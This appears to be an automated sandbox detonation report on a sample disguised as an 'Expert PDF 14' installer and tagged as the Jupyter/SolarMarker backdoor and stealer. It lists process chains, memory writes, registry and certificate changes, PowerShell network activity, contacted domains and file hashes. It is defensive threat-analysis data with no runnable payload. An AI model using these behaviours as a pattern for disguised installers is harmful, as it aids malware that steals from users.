f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1768 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 1372 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe
PID 580 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$70122,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

"C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Network

Country Destination Domain Proto
US 8.8.8.8:53 api-updateservice.expert-pdf.com udp
CA 64.15.159.225:443 api-updateservice.expert-pdf.com tcp
US 8.8.8.8:53 wsgeoip.expert-pdf.com udp
CA 64.15.159.225:443 wsgeoip.expert-pdf.com tcp

Files

memory/1768-54-0x0000000000400000-0x0000000000501000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

MD5 a95712856401dda069ee07c719bdb2ab
SHA1 73293e45116e0930d78087741016cde920922a74
SHA256 b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA512 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

MD5 a95712856401dda069ee07c719bdb2ab
SHA1 73293e45116e0930d78087741016cde920922a74
SHA256 b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA512 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

memory/1372-66-0x00000000001E0000-0x00000000001E1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

memory/1372-81-0x0000000000400000-0x0000000000723000-memory.dmp

memory/1768-83-0x0000000000400000-0x0000000000501000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\Cab409C.tmp

MD5 fc4666cbca561e864e7fdf883a9e6661
SHA1 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5
SHA256 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b
SHA512 c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

C:\Users\Admin\AppData\Local\Temp\Tar4198.tmp

MD5 73b4b714b42fc9a6aaefd0ae59adb009
SHA1 efdaffd5b0ad21913d22001d91bf6c19ecb4ac41
SHA256 c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd
SHA512 73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 e71c8443ae0bc2e282c73faead0a6dd3
SHA1 0c110c1b01e68edfacaeae64781a37b1995fa94b
SHA256 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512 b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

C:\Users\Admin\AppData\Local\Temp\Tar4392.tmp

MD5 be2bec6e8c5653136d3e72fe53c98aa3
SHA1 a8182d6db17c14671c3d5766c72e58d87c0810de
SHA256 1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd
SHA512 0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 acc795abc9374d0e5f0a3b9bba4d81b6
SHA1 6752858c95e9aa95ba51d367eb098fd4caea3766
SHA256 2a2106f5ec627952e4dafc37f1c6e0bbd1abeb6633d2aec13c48f92e2b4e7aac
SHA512 e6ffb0f51858ba10d4dc5da6ad2b44015ed9deed7b3fdd9f0e4e2f40be7f5fe8805e80f0c1e2727a5a33d9298524321a330c95b3f8949d3790f86737bb9b0970

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-17 18:08

Reported

2023-03-17 18:35

Platform

win10v2004-20230220-en

Max time kernel

1218s

Max time network

1234s

Command Line

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ = "IDownloadItemExternalApp" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\TypeLib\Version = "1.0" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\LocalizedString = "@%programdata%\\Expert PDF 14\\Installation\\Statistics.dll,-127" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
